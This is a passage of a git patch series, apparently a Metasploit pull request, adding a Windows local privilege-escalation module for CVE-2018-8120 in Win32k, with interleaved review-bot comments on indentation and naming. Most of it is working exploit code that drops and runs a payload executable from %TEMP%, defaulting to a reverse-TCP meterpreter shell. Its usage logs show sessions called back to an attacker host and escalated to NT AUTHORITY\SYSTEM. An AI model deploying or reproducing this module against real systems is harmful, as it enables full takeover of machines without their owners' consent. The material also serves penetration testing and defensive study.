Win32k NULL Pointer Dereference") + temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename write_file_to_target(temprexe,rexe) end vprint_good("File path: #{temprexe}") 
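Review bot: The rewritten `initialize` loses its closing `end`. The removed side finishes with `register_options(...)` and `end`, while the added side stops at `}))` and is followed directly by `def validate_target`. The last hunk of this commit adds an extra `end` after `print_good('Exploit finished, ...')`, which presumably keeps the file parsing but leaves every later `def` nested inside `initialize`; the later hunk headers on this page show `def initialize(info={})` as their enclosing context. Add `end` immediately after `}))` and drop the extra `end` at the bottom of `exploit`. The new `'Name' => 'Windows ClientCopyImage Win32k Exploit'` also disagrees with the `SetImeInfoEx` status message in `write_exe_to_target`.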
@@ -89,13 +84,13 @@ class MetasploitModule < Msf::Exploit::Local def write_file_to_target(temprexe,rexe) fd = session.fs.file.new(temprexe, "wb") - fd.write(rexe) + fd.write(rexe) fd.close end def create_payload_from_file(exec) vprint_status("Reading payload from file #{exec}") - ::IO.read(exec) + ::IO.read(exec) end def exploit @@ -108,17 +103,19 @@ class MetasploitModule < Msf::Exploit::Local cmd = tempdir + "\\" + tempexename + ".exe" vprint_status("Preparing payload at #{cmd}") write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe script_on_target = write_exe_to_target(raw, rexename) command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename vprint_status("Location of CVE-2018-8120.exe is: #{command}") command += " " - command += "#{cmd}" - vprint_status("Executing command : #{command}") - command_output = cmd_exec(command) - print_good(command_output) + command += "#{cmd}" + vprint_status("Executing command : #{command}") + command_output = cmd_exec(command) + print_status(command_output) + print_good('Exploit finished, wait for privileged payload execution to complete.') + end end end From 097e9b8bfe7f2805b776868e9c4b55e6572f4d07 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Mon, 8 Oct 2018 14:48:05 +0530 Subject: [PATCH 18/39] Indentation --- .../windows/local/ms18_8120_win32k_privsec.rb | 70 +++++++++---------- 1 file changed, 35 insertions(+), 35 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 193fabda06..67712b79ed 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb 
+++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb 
@@ -71,51 +71,51 @@ def initialize(info={}) end end - def write_exe_to_target(rexe, rexename) - begin - vprint_warning("Writing file to %TEMP%") - print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") - temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - write_file_to_target(temprexe,rexe) - end + + def write_exe_to_target(rexe, rexename) + begin + vprint_warning("Writing file to %TEMP%") + print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") + temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + write_file_to_target(temprexe,rexe) + end vprint_good("File path: #{temprexe}") temprexe - end + end def write_file_to_target(temprexe,rexe) - fd = session.fs.file.new(temprexe, "wb") - fd.write(rexe) - fd.close - end + fd = session.fs.file.new(temprexe, "wb") + fd.write(rexe) + fd.close + end def create_payload_from_file(exec) vprint_status("Reading payload from file #{exec}") - ::IO.read(exec) + ::IO.read(exec) end - def exploit + def exploit @payload_name = datastore['PAYLOAD'] rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - vprint_status("EXE's name is: #{rexename}") - exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" - vprint_status("Preparing payload at #{cmd}") - write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe - script_on_target = write_exe_to_target(raw, rexename) - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - vprint_status("Location of CVE-2018-8120.exe is: #{command}") - - command += " " - command += "#{cmd}" - vprint_status("Executing command : #{command}") - command_output = cmd_exec(command) - print_status(command_output) - print_good('Exploit finished, wait for privileged payload 
execution to complete.') - end + vprint_status("EXE's name is: #{rexename}") + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + cmd = tempdir + "\\" + tempexename + ".exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + vprint_status("Location of CVE-2018-8120.exe is: #{command}") + command += " " + command += "#{cmd}" + vprint_status("Executing command : #{command}") + command_output = cmd_exec(command) + print_status(command_output) + print_good('Exploit finished, wait for privileged payload execution to complete.') end + end end From 56a39545c628056169514e804d0edc883cfc3a45 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Mon, 8 Oct 2018 16:40:19 +0530 Subject: [PATCH 19/39] Updating --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 67712b79ed..2251250f54 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'Windows ClientCopyImage Win32k Exploit', + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who 
From e2f9fb5d8e6999b873092984c78083d33eea152b Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 9 Oct 2018 12:52:34 +0530 Subject: [PATCH 20/39] Updating Indentation --- .../windows/local/ms18_8120_win32k_privsec.rb | 44 ++++++++++--------- 1 file changed, 23 insertions(+), 21 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 2251250f54..c2522eb64a 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', + 'Name' => 'Windows ClientCopyImage Win32k Exploit', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who 
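Review bot: The first hunk of this commit, titled as an indentation update, switches `'Name'` back to `'Windows ClientCopyImage Win32k Exploit'`, undoing the rename made by the previous commit. The status line in `write_exe_to_target` says `SetImeInfoEx` and the references point at CVE-2018-8120, so the metadata and the runtime message now disagree. Keep `'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference',` and leave this commit to whitespace only.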
@@ -91,30 +91,32 @@ def initialize(info={}) def create_payload_from_file(exec) vprint_status("Reading payload from file #{exec}") - ::IO.read(exec) + ::IO.read(exec) end def exploit @payload_name = datastore['PAYLOAD'] - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" - vprint_status("EXE's name is: #{rexename}") - exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" - vprint_status("Preparing payload at #{cmd}") - write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe - script_on_target = write_exe_to_target(raw, rexename) - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - vprint_status("Location of CVE-2018-8120.exe is: #{command}") - command += " " - command += "#{cmd}" - vprint_status("Executing command : #{command}") - command_output = cmd_exec(command) - print_status(command_output) + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + vprint_status("EXE's name is: #{rexename}") + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + + cmd = tempdir + "\\" + tempexename + ".exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + vprint_status("Location of CVE-2018-8120.exe is: #{command}") + + command += " " + command += "#{cmd}" + vprint_status("Executing command : #{command}") + command_output = cmd_exec(command) + print_line(command_output) 
print_good('Exploit finished, wait for privileged payload execution to complete.') end end From 619a07fc3c13635fd6ccf861e5e1a0c3abce7597 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 14:21:08 +0530 Subject: [PATCH 21/39] Update --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index c2522eb64a..d9058f948e 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -70,8 +70,7 @@ def initialize(info={}) fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end end - - + def write_exe_to_target(rexe, rexename) begin vprint_warning("Writing file to %TEMP%") @@ -82,7 +81,7 @@ def initialize(info={}) vprint_good("File path: #{temprexe}") temprexe end - + def write_file_to_target(temprexe,rexe) fd = session.fs.file.new(temprexe, "wb") fd.write(rexe) @@ -93,7 +92,7 @@ def initialize(info={}) vprint_status("Reading payload from file #{exec}") ::IO.read(exec) end - + def exploit @payload_name = datastore['PAYLOAD'] rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" From dbcee569954269907b22b600bd9f44780234baf0 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 15:10:58 +0530 Subject: [PATCH 22/39] Fixing spaces at EOL --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index d9058f948e..c14b3575e5 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb 
@@ -70,7 +70,7 @@ def initialize(info={}) fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end end - + def write_exe_to_target(rexe, rexename) begin vprint_warning("Writing file to %TEMP%") @@ -81,7 +81,7 @@ def initialize(info={}) vprint_good("File path: #{temprexe}") temprexe end - + def write_file_to_target(temprexe,rexe) fd = session.fs.file.new(temprexe, "wb") fd.write(rexe) @@ -92,7 +92,7 @@ def initialize(info={}) vprint_status("Reading payload from file #{exec}") ::IO.read(exec) end - + def exploit @payload_name = datastore['PAYLOAD'] rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" From c1c07d5c8f081f5c1ffc91e1e7e66f047bd8956e Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 21:30:12 +0530 Subject: [PATCH 23/39] Updating Suggestion given by Shelby --- .../windows/local/ms18_8120_win32k_privsec.rb | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index c14b3575e5..97940087e9 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb @@ -3,12 +3,9 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core/exploit/exe' - class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking - include Msf::Post::Common include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::EXE 
@@ -95,26 +92,26 @@ def initialize(info={}) def exploit @payload_name = datastore['PAYLOAD'] - rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" vprint_status("EXE's name is: #{rexename}") exe = generate_payload_exe tempdir = session.sys.config.getenv('TEMP') tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - cmd = tempdir + "\\" + tempexename + ".exe" + cmd = "#{tempdir}\\#{tempexename}.exe" vprint_status("Preparing payload at #{cmd}") write_file(cmd, exe) vprint_status("Payload uploaded to temp folder") rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file rexe + raw = create_payload_from_file(rexe) script_on_target = write_exe_to_target(raw, rexename) - command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" vprint_status("Location of CVE-2018-8120.exe is: #{command}") command += " " command += "#{cmd}" vprint_status("Executing command : #{command}") - command_output = cmd_exec(command) + command_output = cmd_exec_get_pid(command) print_line(command_output) print_good('Exploit finished, wait for privileged payload execution to complete.') end From 4a821101ce9225460392d242b7804c23a80a5b9e Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 21:59:46 +0530 Subject: [PATCH 24/39] Fixing cmd_exec_get_pid --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 97940087e9..6108d69ebc 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb 
@@ -111,8 +111,7 @@ def initialize(info={}) command += " " command += "#{cmd}" vprint_status("Executing command : #{command}") - command_output = cmd_exec_get_pid(command) - print_line(command_output) + pid = cmd_exec_get_pid(command) print_good('Exploit finished, wait for privileged payload execution to complete.') end end From 3de0d81a44411854a2a0a59ff749b54eb5308189 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 22:05:19 +0530 Subject: [PATCH 25/39] Deleting documenation from /post/windows/escalate --- .../escalate/ms18_8120_win32k_privsec.md | 66 ------------------- 1 file changed, 66 deletions(-) delete mode 100644 documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md diff --git a/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md b/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md deleted file mode 100644 index 09afbd29a0..0000000000 --- a/documentation/modules/post/windows/escalate/ms18_8120_win32k_privsec.md +++ /dev/null 
@@ -1,66 +0,0 @@ -## Overview - -An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. - -To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. - -The update addresses this vulnerability by correcting how Win32k handles objects in memory. - -* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120 -* http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html -* https://github.com/bigric3/cve-2018-8120 -* https://github.com/unamer/CVE-2018-8120 - -## Verification steps - -1. Start `msfconsole` -2. Get a session -3. `use post/windows/escalate/ms18_8120_win32k_privsec` -4. `set SESSION [SESSION]` -5. `set POCCMD whoami` -6. `run` - -## Usage - -``` -msf exploit(windows/http/badblue_passthru) > run - -[*] Started reverse TCP handler on 192.168.1.102:4444 -[*] Trying target BadBlue EE 2.7 Universal... -[*] Sending stage (179779 bytes) to 192.168.1.105 -[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.105:49214) at 2018-09-18 14:52:55 +0530 - -meterpreter > getuid -Server username: zero-PC\low -meterpreter > background -[*] Backgrounding session 1... -msf exploit(windows/http/badblue_passthru) > use post/windows/escalate/ms18_8120_win32k_privsec -msf post(windows/escalate/ms18_8120_win32k_privsec) > set SESSION 1 -SESSION => 1 -msf post(windows/escalate/ms18_8120_win32k_privsec) > set POCCMD whoami -POCCMD => whoami -msf post(windows/escalate/ms18_8120_win32k_privsec) > run - -[!] SESSION may not be compatible with this module. 
-[*] exe name is: f4MZlRO4LZ.exe -[*] Reading Payload from file /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.17.11/data/exploits/CVE-2018-0824/CVE-2018-8120.exe -[!] writing to %TEMP% -[+] Persistent Script written to C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe -[*] Starting module.. - -[*] Location of CVE-2018-8120.exe is: C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe -[*] Executing command : C:\Users\LOW~1.ZER\AppData\Local\Temp\f4MZlRO4LZ.exe whoami -CVE-2018-8120 exploit by @unamer(https://github.com/unamer) -[+] Detected kernel ntoskrnl.exe -[+] Get manager at fffff900c1a4e720,worker at fffff900c1a52060 -[+] Triggering vulnerability... -[+] Overwriting...fffff80002a35c38 -[+] Elevating privilege... -[+] Cleaning up... -[+] Trying to execute whoami as SYSTEM... -[+] Process created with pid 3516! -nt authority\system - -[*] Post module execution completed -msf post(windows/escalate/ms18_8120_win32k_privsec) > -``` From 48432491a29341188731b176e019b0f4c810de4f Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 22:11:05 +0530 Subject: [PATCH 26/39] Adding documentation Documentation path: documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md --- .../windows/local/ms18_8120_win32k_privsec.md | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md diff --git a/documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md b/documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md new file mode 100644 index 0000000000..89f2180dde --- /dev/null +++ b/documentation/modules/exploit/windows/local/ms18_8120_win32k_privsec.md 
@@ -0,0 +1,52 @@ +## Overview + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. + +To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system. + +The update addresses this vulnerability by correcting how Win32k handles objects in memory. + +* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120 +* http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html +* https://github.com/bigric3/cve-2018-8120 +* https://github.com/unamer/CVE-2018-8120 + +## Verification steps + +1. Start `msfconsole` +2. Get a session +3. `use exploit/windows/local/ms18_8120_win32k_privsec` +4. `set SESSION [SESSION]` +5. `set LHOST [LHOST]` +6. `exploit` + +## Usage + +``` +msf exploit(multi/handler) > run + +[*] Started reverse TCP handler on 192.168.1.102:4444 +[*] Sending stage (206403 bytes) to 192.168.1.103 +[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:56748) at 2018-10-10 21:55:52 +0530 + +meterpreter > getuid +Server username: zero-PC\zero +meterpreter > background +[*] Backgrounding session 1... 
+msf exploit(multi/handler) > use exploit/windows/local/ms18_8120_win32k_privsec +msf exploit(windows/local/ms18_8120_win32k_privsec) > set SESSION 1 +SESSION => 1 +msf exploit(windows/local/ms18_8120_win32k_privsec) > set LHOST 192.168.1.102 +LHOST => 192.168.1.102 +msf exploit(windows/local/ms18_8120_win32k_privsec) > run + +[*] Started reverse TCP handler on 192.168.1.102:4444 +[+] Exploiting SetImeInfoEx Win32k NULL Pointer Dereference +[+] Exploit finished, wait for privileged payload execution to complete. +[*] Sending stage (206403 bytes) to 192.168.1.103 +[*] Meterpreter session 2 opened (192.168.1.102:4444 -> 192.168.1.103:56749) at 2018-10-10 21:56:35 +0530 + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > +``` From ee2c6274c71413c55a5f57750d6183aec75b3962 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Wed, 10 Oct 2018 22:26:07 +0530 Subject: [PATCH 27/39] Updating description --- modules/exploits/windows/local/ms18_8120_win32k_privsec.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index 6108d69ebc..e4b740b2c7 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb 
@@ -13,13 +13,15 @@ class MetasploitModule < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'Windows ClientCopyImage Win32k Exploit', + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', 'Description' => %q{ This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. + + This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. }, 'License' => MSF_LICENSE, 'Author' => [ From 76325bd21e0d571764d389184e7906e514ad21c9 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Wed, 10 Oct 2018 14:18:44 -0500 Subject: [PATCH 28/39] fixed indentation --- .../windows/local/ms18_8120_win32k_privsec.rb | 194 +++++++++--------- 1 file changed, 97 insertions(+), 97 deletions(-) diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb index e4b740b2c7..19cbfd96cf 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privsec.rb 
@@ -11,110 +11,110 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Post::Windows::Process -def initialize(info={}) - super(update_info(info, { - 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', - 'Description' => %q{ - This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 - when the Win32k component fails to properly handle objects in memory. An attacker who - successfully exploited this vulnerability could run arbitrary code in kernel mode. An - attacker could then install programs; view, change, or delete data; or create new - accounts with full user rights. + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', + 'Description' => %q{ + This module exploits elevation of privilege vulnerability exists in Windows 7 and 2008 R2 + when the Win32k component fails to properly handle objects in memory. An attacker who + successfully exploited this vulnerability could run arbitrary code in kernel mode. An + attacker could then install programs; view, change, or delete data; or create new + accounts with full user rights. - This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. + This module is tested against windows 7 x64 and windows server 2008 R2 standard x64. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'unamer', # Exploit PoC + 'bigric3', # Analysis and exploit + 'Anton Cherepanov', # Vulnerability discovery + 'Dhiraj Mishra ' # Metasploit module + ], + 'Arch' => [ ARCH_X64 ], + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => { + 'EXITFUNC' => 'thread', + 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }, - 'License' => MSF_LICENSE, - 'Author' => [ - 'unamer', # Exploit PoC - 'bigric3', # Analysis and exploit - 'Anton Cherepanov', # Vulnerability discovery - 'Dhiraj Mishra ' # Metasploit module - ], - 'Arch' => [ ARCH_X64 ], - 'Platform' => 'win', - 'SessionTypes' => [ 'meterpreter' ], - 'DefaultOptions' => { - 'EXITFUNC' => 'thread', - 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' - }, - 'Targets' => [ - [ 'Windows x64', { 'Arch' => ARCH_X64 } ] - ], - 'Payload' => { - 'Space' => 4096, - 'DisableNops' => true - }, - 'References' => [ - ['BID', '104034'], - ['CVE', '2018-8120'], - ['URL', 'https://github.com/unamer/CVE-2018-8120'], - ['URL', 'https://github.com/bigric3/cve-2018-8120'], - ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], - ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'] - ], - 'DisclosureDate' => 'May 9 2018', - 'DefaultTarget' => 0 - })) - - def validate_target - if is_system? 
- fail_with(Failure::None, 'Session is already elevated') - end - - if sysinfo['Architecture'] == ARCH_X86 - fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') - end - - if sysinfo['OS'] =~ /XP/ - fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') - end + 'Targets' => [ + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'Payload' => { + 'Space' => 4096, + 'DisableNops' => true + }, + 'References' => [ + ['BID', '104034'], + ['CVE', '2018-8120'], + ['URL', 'https://github.com/unamer/CVE-2018-8120'], + ['URL', 'https://github.com/bigric3/cve-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'] + ], + 'DisclosureDate' => 'May 9 2018', + 'DefaultTarget' => 0 + )) end - def write_exe_to_target(rexe, rexename) - begin - vprint_warning("Writing file to %TEMP%") - print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") - temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename - write_file_to_target(temprexe,rexe) - end - vprint_good("File path: #{temprexe}") - temprexe +def validate_target + if is_system? 
+ fail_with(Failure::None, 'Session is already elevated') end - def write_file_to_target(temprexe,rexe) - fd = session.fs.file.new(temprexe, "wb") - fd.write(rexe) - fd.close + if sysinfo['Architecture'] == ARCH_X86 + fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') end - def create_payload_from_file(exec) - vprint_status("Reading payload from file #{exec}") - ::IO.read(exec) - end - - def exploit - @payload_name = datastore['PAYLOAD'] - rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" - vprint_status("EXE's name is: #{rexename}") - exe = generate_payload_exe - tempdir = session.sys.config.getenv('TEMP') - tempexename = Rex::Text.rand_text_alpha(rand(8)+6) - - cmd = "#{tempdir}\\#{tempexename}.exe" - vprint_status("Preparing payload at #{cmd}") - write_file(cmd, exe) - vprint_status("Payload uploaded to temp folder") - rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file(rexe) - script_on_target = write_exe_to_target(raw, rexename) - command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" - vprint_status("Location of CVE-2018-8120.exe is: #{command}") - - command += " " - command += "#{cmd}" - vprint_status("Executing command : #{command}") - pid = cmd_exec_get_pid(command) - print_good('Exploit finished, wait for privileged payload execution to complete.') + if sysinfo['OS'] =~ /XP/ + fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end - end end + +def write_exe_to_target(rexe, rexename) +begin +vprint_warning("Writing file to %TEMP%") + print_good("Exploiting SetImeInfoEx Win32k NULL Pointer Dereference") + temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename +write_file_to_target(temprexe,rexe) +end +vprint_good("File path: #{temprexe}") +temprexe +end + +def write_file_to_target(temprexe,rexe) + fd = session.fs.file.new(temprexe, "wb") + fd.write(rexe) + fd.close +end + +def create_payload_from_file(exec) + 
vprint_status("Reading payload from file #{exec}") + ::IO.read(exec) +end + +def exploit + @payload_name = datastore['PAYLOAD'] + rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" + vprint_status("EXE's name is: #{rexename}") + exe = generate_payload_exe + tempdir = session.sys.config.getenv('TEMP') + tempexename = Rex::Text.rand_text_alpha(rand(8)+6) + + cmd = "#{tempdir}\\#{tempexename}.exe" + vprint_status("Preparing payload at #{cmd}") + write_file(cmd, exe) + vprint_status("Payload uploaded to temp folder") + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') + raw = create_payload_from_file(rexe) + script_on_target = write_exe_to_target(raw, rexename) + command = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" + vprint_status("Location of CVE-2018-8120.exe is: #{command}") + + command += " " + command += "#{cmd}" + vprint_status("Executing command : #{command}") + pid = cmd_exec_get_pid(command) + print_good('Exploit finished, wait for privileged payload execution to complete.') +end + end From 04cc40136f1136366d89e430678815b54f36a946 Mon 